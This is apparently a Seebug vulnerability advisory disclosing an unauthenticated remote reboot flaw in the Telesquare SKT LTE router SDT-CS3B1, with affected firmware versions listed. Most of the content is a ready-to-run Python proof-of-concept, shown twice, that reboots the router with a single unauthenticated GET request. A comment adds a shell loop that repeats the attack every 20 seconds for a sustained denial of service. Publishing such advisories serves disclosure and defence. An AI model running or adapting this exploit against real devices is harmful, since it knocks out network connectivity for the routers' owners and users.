Telesquare SKT LTE Router SDT-CS3B1 Remote Reboot Denial Of Service

2017-12-29T00:00:00
ID SSV:97030
Type seebug
Reporter Root
Modified 2017-12-29T00:00:00

Description

Summary

We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G LTE wireless communication based LTE router product.

Description

The router suffers from an unauthenticated reboot command execution. Attackers can exploit this issue to cause a denial of service scenario.

/lte/lteuicc.shtml: 858: function RebootRequest() 859: { 860: var url = "../cgi-bin/lte.cgi?"; 861: var param = "Command=Reboot"; 862: XHRPost(RebootHandle, url, param, false ); //sync call 863: }

Vendor

Telesquare Co., Ltd. - http://www.telesquare.co.kr

Affected Version

  • FwVer: SDT-CS3B1, sw version 1.2.0
  • LteVer: ML300S5XEA41_090 1 0.1.0
  • Modem model: PM-L300S

Tested On

  • lighttpd/1.4.20

PoC

``` import sys, requests

if len(sys.argv) < 2: print 'SKT LTE Router SDT-CS3B1 Remote Reboot' print 'Usage: b00t.py <ip> <port>\n' quit()

ip = sys.argv[1] port = sys.argv[2]

r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")

shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done

print r.content #if in r.content: <xml></xml>, reboot true.

print "Router rebooted." ```

                                        
                                            
                                                import sys, requests

if len(sys.argv) &lt; 2:
	print 'SKT LTE Router SDT-CS3B1 Remote Reboot'
	print 'Usage: b00t.py &lt;ip&gt; &lt;port&gt;\n'
	quit()

ip = sys.argv[1]
port = sys.argv[2]

r = requests.get("http://"+ip+":"+port+"/cgi-bin/lte.cgi?Command=Reboot")

# shw: while true; do ./b00t.py 10.0.0.17 8081; sleep 20; done
#print r.content  #if in r.content: &lt;xml&gt;&lt;/xml&gt;, reboot true.

print "Router rebooted."